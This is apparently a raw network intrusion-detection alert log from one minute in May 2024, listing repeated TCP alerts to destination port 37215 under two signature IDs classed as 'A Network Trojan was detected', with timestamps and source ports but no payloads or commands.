          Timestamp:05/28/24-14:47:28.425082
          SID:2835222
          Source Port:57360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845679
          SID:2829579
          Source Port:46690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328057
          SID:2835222
          Source Port:48096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770881
          SID:2829579
          Source Port:37968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299062
          SID:2835222
          Source Port:55250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.049044
          SID:2829579
          Source Port:39640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.864136
          SID:2835222
          Source Port:41466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549287
          SID:2829579
          Source Port:54380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845740
          SID:2829579
          Source Port:58904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.222802
          SID:2829579
          Source Port:55596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741809
          SID:2835222
          Source Port:34458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.988946
          SID:2835222
          Source Port:60426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204619
          SID:2829579
          Source Port:51878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328482
          SID:2835222
          Source Port:45954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.499812
          SID:2829579
          Source Port:40342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530413
          SID:2835222
          Source Port:57798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.855581
          SID:2835222
          Source Port:55306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.766979
          SID:2835222
          Source Port:33308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.685455
          SID:2835222
          Source Port:43208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.355874
          SID:2835222
          Source Port:49072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.051040
          SID:2835222
          Source Port:55198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067334
          SID:2835222
          Source Port:55422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890835
          SID:2835222
          Source Port:50856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.500001
          SID:2829579
          Source Port:56784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878600
          SID:2829579
          Source Port:60918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739929
          SID:2835222
          Source Port:40348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.153553
          SID:2835222
          Source Port:60532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.730176
          SID:2829579
          Source Port:54482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.219605
          SID:2835222
          Source Port:40410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.316988
          SID:2835222
          Source Port:34162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939584
          SID:2829579
          Source Port:58036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399814
          SID:2835222
          Source Port:52584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462560
          SID:2835222
          Source Port:51216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466196
          SID:2829579
          Source Port:35820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.488320
          SID:2835222
          Source Port:60838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728497
          SID:2829579
          Source Port:52226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297754
          SID:2835222
          Source Port:34026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209416
          SID:2829579
          Source Port:45352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978347
          SID:2835222
          Source Port:51616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.061838
          SID:2829579
          Source Port:43136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.871245
          SID:2835222
          Source Port:47066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.164461
          SID:2835222
          Source Port:36876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893279
          SID:2835222
          Source Port:44052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.483181
          SID:2829579
          Source Port:38524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.368516
          SID:2829579
          Source Port:58644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271454
          SID:2829579
          Source Port:41414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943921
          SID:2835222
          Source Port:33056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764466
          SID:2835222
          Source Port:42600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727952
          SID:2835222
          Source Port:53598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.930984
          SID:2835222
          Source Port:59856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.115627
          SID:2829579
          Source Port:48518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793681
          SID:2835222
          Source Port:55796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.022172
          SID:2829579
          Source Port:35416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.437820
          SID:2829579
          Source Port:50836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177240
          SID:2835222
          Source Port:47344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976688
          SID:2829579
          Source Port:43158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.858816
          SID:2835222
          Source Port:40104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.875940
          SID:2829579
          Source Port:47276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.300243
          SID:2829579
          Source Port:44572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326634
          SID:2835222
          Source Port:35128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.511380
          SID:2829579
          Source Port:39260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.626463
          SID:2835222
          Source Port:45994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764028
          SID:2829579
          Source Port:55302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.657060
          SID:2835222
          Source Port:52936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949719
          SID:2829579
          Source Port:42766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.348887
          SID:2835222
          Source Port:59200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.986223
          SID:2829579
          Source Port:35624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530256
          SID:2835222
          Source Port:44648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978899
          SID:2829579
          Source Port:59226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.169883
          SID:2829579
          Source Port:58430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839833
          SID:2829579
          Source Port:48202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976349
          SID:2835222
          Source Port:46200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711159
          SID:2829579
          Source Port:53122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.810801
          SID:2829579
          Source Port:49282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.483906
          SID:2829579
          Source Port:40870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.550166
          SID:2835222
          Source Port:51590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.245653
          SID:2829579
          Source Port:45826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.227239
          SID:2829579
          Source Port:52418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.412088
          SID:2829579
          Source Port:53004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774277
          SID:2829579
          Source Port:35864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665648
          SID:2835222
          Source Port:40098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.282021
          SID:2829579
          Source Port:34580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204788
          SID:2829579
          Source Port:50136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.623921
          SID:2835222
          Source Port:39828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125715
          SID:2835222
          Source Port:58072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473599
          SID:2829579
          Source Port:42358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.525306
          SID:2829579
          Source Port:40876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.868655
          SID:2829579
          Source Port:38070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.295056
          SID:2829579
          Source Port:34666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229482
          SID:2835222
          Source Port:46054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.191790
          SID:2835222
          Source Port:38122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535722
          SID:2835222
          Source Port:52406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.909499
          SID:2829579
          Source Port:36564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891087
          SID:2829579
          Source Port:37590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.562471
          SID:2835222
          Source Port:59254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.493218
          SID:2835222
          Source Port:59174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.681992
          SID:2835222
          Source Port:34072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067238
          SID:2835222
          Source Port:48824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337563
          SID:2829579
          Source Port:50538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893939
          SID:2835222
          Source Port:54308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794930
          SID:2835222
          Source Port:40092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989515
          SID:2829579
          Source Port:57828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.685597
          SID:2829579
          Source Port:40586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594722
          SID:2829579
          Source Port:59626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709299
          SID:2829579
          Source Port:35432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978379
          SID:2835222
          Source Port:43940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.235431
          SID:2835222
          Source Port:53512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.553807
          SID:2835222
          Source Port:56194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299439
          SID:2835222
          Source Port:39432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963930
          SID:2835222
          Source Port:33520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190686
          SID:2829579
          Source Port:55858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143684
          SID:2829579
          Source Port:45552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.768748
          SID:2829579
          Source Port:43748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840071
          SID:2829579
          Source Port:54532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892538
          SID:2829579
          Source Port:35642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334323
          SID:2835222
          Source Port:38182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.285759
          SID:2829579
          Source Port:46324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.293707
          SID:2829579
          Source Port:33340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.542326
          SID:2835222
          Source Port:54786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.782266
          SID:2835222
          Source Port:56382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324704
          SID:2835222
          Source Port:55840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729521
          SID:2835222
          Source Port:60782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299601
          SID:2835222
          Source Port:47876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842926
          SID:2829579
          Source Port:46986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.712099
          SID:2829579
          Source Port:37392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402575
          SID:2829579
          Source Port:41060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537546
          SID:2829579
          Source Port:33646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202734
          SID:2829579
          Source Port:40924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.635109
          SID:2835222
          Source Port:51810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.215080
          SID:2835222
          Source Port:57636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.205623
          SID:2829579
          Source Port:46870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.039087
          SID:2829579
          Source Port:44518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116997
          SID:2835222
          Source Port:57548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943370
          SID:2829579
          Source Port:36704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.685055
          SID:2829579
          Source Port:33612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.998820
          SID:2829579
          Source Port:37910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.998658
          SID:2835222
          Source Port:42364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846271
          SID:2835222
          Source Port:43280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.084342
          SID:2835222
          Source Port:40162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062049
          SID:2829579
          Source Port:38882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065329
          SID:2829579
          Source Port:45058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.992918
          SID:2829579
          Source Port:60620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472438
          SID:2835222
          Source Port:49300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.985164
          SID:2829579
          Source Port:55474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.160098
          SID:2829579
          Source Port:50322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922784
          SID:2835222
          Source Port:35772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.037249
          SID:2835222
          Source Port:43342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.330064
          SID:2835222
          Source Port:45024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.636894
          SID:2835222
          Source Port:50480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.961757
          SID:2835222
          Source Port:49534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170653
          SID:2829579
          Source Port:55914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.117881
          SID:2829579
          Source Port:50476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876923
          SID:2835222
          Source Port:58008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.557254
          SID:2829579
          Source Port:41678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.870729
          SID:2829579
          Source Port:53088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.629277
          SID:2835222
          Source Port:56892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709033
          SID:2835222
          Source Port:55066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214790
          SID:2829579
          Source Port:34958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161646
          SID:2829579
          Source Port:50424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.679893
          SID:2829579
          Source Port:48708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755701
          SID:2835222
          Source Port:37102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939386
          SID:2829579
          Source Port:44422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112116
          SID:2829579
          Source Port:52382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.051259
          SID:2829579
          Source Port:34020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269294
          SID:2835222
          Source Port:57342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.187407
          SID:2835222
          Source Port:35990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176410
          SID:2835222
          Source Port:55186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339520
          SID:2829579
          Source Port:38770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.327956
          SID:2829579
          Source Port:40588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.867495
          SID:2835222
          Source Port:43946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793310
          SID:2835222
          Source Port:34712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213429
          SID:2829579
          Source Port:34986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485233
          SID:2835222
          Source Port:41010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742376
          SID:2829579
          Source Port:53220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273303
          SID:2835222
          Source Port:39140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480900
          SID:2829579
          Source Port:46124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.493104
          SID:2829579
          Source Port:60902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764701
          SID:2835222
          Source Port:58556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923066
          SID:2835222
          Source Port:45576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842326
          SID:2829579
          Source Port:43240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724645
          SID:2829579
          Source Port:52610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.817729
          SID:2835222
          Source Port:37712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.737948
          SID:2835222
          Source Port:34472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960238
          SID:2829579
          Source Port:33004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.298235
          SID:2835222
          Source Port:57108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755884
          SID:2835222
          Source Port:58400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711380
          SID:2835222
          Source Port:45368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728033
          SID:2835222
          Source Port:35948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878545
          SID:2835222
          Source Port:34556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112979
          SID:2835222
          Source Port:47598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.735850
          SID:2835222
          Source Port:49298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.987508
          SID:2829579
          Source Port:54420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.197353
          SID:2835222
          Source Port:49938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.805168
          SID:2829579
          Source Port:50318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400745
          SID:2829579
          Source Port:39794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341166
          SID:2835222
          Source Port:35666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.025706
          SID:2835222
          Source Port:51576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.819403
